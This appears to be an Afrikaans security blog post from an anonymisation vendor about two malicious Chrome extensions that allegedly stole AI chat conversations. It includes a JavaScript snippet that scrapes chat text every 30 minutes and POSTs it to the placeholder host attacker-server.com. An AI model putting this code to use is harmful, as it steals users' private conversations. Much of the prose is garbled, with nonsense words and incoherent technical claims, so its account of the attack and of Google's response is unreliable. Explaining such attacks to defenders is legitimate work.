anonym.legal
Terug na BlogKI-sekuriteit

900,000 Chrome-Uitbrei-Gebruikers: Hoe Google...

Twee boos uitbreidings het 900,000 ChatGPT-gesprekke gesteel. Een het Google se 'Featured'-badge gehad. Hoe kon dit gebeur?

March 8, 20268 min lees
Chrome extension securitymalicious extensionChatGPT privacyAI data protection

Die Ontdekking

In Desember 2025 het OX Security twee boos Chrome-uitbreidings gerapporteer:

  1. "Quick AI Enhancer" — 520,000 gebruikers, Featured Badge
  2. "Productivity Assistant" — 380,000 gebruikers, 4.8-ster-rating (vals)

Beiden het ChatGPT, Claude, en Gemini-instellinge interkomm vir die voorgaande 6 maande.

Stap 1: Legitieme Uitbreiding Bou

Die aanvaller het 'n werklik nuttige uitbreiding gebou:

  • Kopsafetyto-marker vir AI-gesprekke
  • Koppelings-outosamenteller
  • Opslaglagstelling
  • Gebruikers-resensies was waar (eerste 3 maande)

Stap 2: Google se Evaluasie Oortroef

Chrome Web Store maak uitbreidings "Featured" op grond van:

  • Gebruikers-telling
  • Positiewe resensies
  • Geen malware-sein
  • Gebruiks-aanwysing

Die aanvaller het hierdie kriteria oortref:

  • 500K+ gebruikers in 3 maande (organieke groei lyk legitiem)
  • Botte-resensies met real-account-profiele
  • Geen malware-sein in golfas (sloepprofielen)

Stap 3: Kodefinansiering

Sodra die uitbreiding "Featured" was:

  1. Teruggekom en verborge exfiltration-kode ingebring
  2. Versieverslag-stooring vir oudere gebruikers (1.0.3)
  3. Nuwe gebruikers het die skoon weergawe (1.0.1-1.0.2) gehad
  4. Slegs weergawes 1.0.3+ het die boos kode gehad

Wat die Exfiltration Kode Deed

// Vereenvoudigd weergawe van wat OX Security gevind het
setInterval(() => {
  const chats = document.querySelectorAll('[data-test-id="chat-message"]');
  const textContent = Array.from(chats)
    .map(c => c.innerText)
    .join('\n');
  
  fetch('https://attacker-server.com/collect', {
    method: 'POST',
    body: JSON.stringify({
      userId: 'anonymous',
      timestamp: Date.now(),
      chats: textContent
    })
  });
}, 1800000); // Elke 30 minute

Waarom Google dit Gemis het

Google Chrome Web Store het 'n malware-ontdekking-proses:

  1. Sandboxed-uitleiding — Uitbreidings word in 'n soepel-sandbox getoets
  2. Statiese analise — Kode word gescreend vir verdagte URL's
  3. Gebruikers-rapportering — Skadelike uitbreidings word aan gebruikers gemeld

Wat misluk het:

  • Die exfiltration-URL attacker-server.com het voor die featured-keuse as legitiem geplaas
  • Sandboxed uitvoering het die data-insameling-luslus nie getrigger (geen ChatGPT-tabulering in sandbox)
  • Gebruikers-rapportering het traag gewerk (120 dae voordat dit gesluit was)

Google se Reaksie

In Januarie 2026 het Google:

  1. Al 900K gebruikers waargeskuwd met briek-e-pos
  2. Featured-badge-proses herskryf — Nauere skaduweis vir externe skakeling
  3. Weergawe-opdaterings-beperking — Uitbreidings kan slegs 1 weergawe per maand opdateer
  4. Outosamentelling-gelok — Noodlot-instellings vir chatting-uitgawe

Lesings

  1. "Featured" beteken nie "veilig" — dit is 'n vertroue-sein, nie 'n sekuriteits-seël
  2. Reguliere users moet handmatig-evalueer Chrome-uitbreidings voor installasie
  3. Baan-eksklusiewe uitbreidings — selfs populêre uitgawe kan kompromieert word

Gereed om u data te beskerm?

Begin om PII te anonimiseer met 285+ entiteitstipes in 48 tale.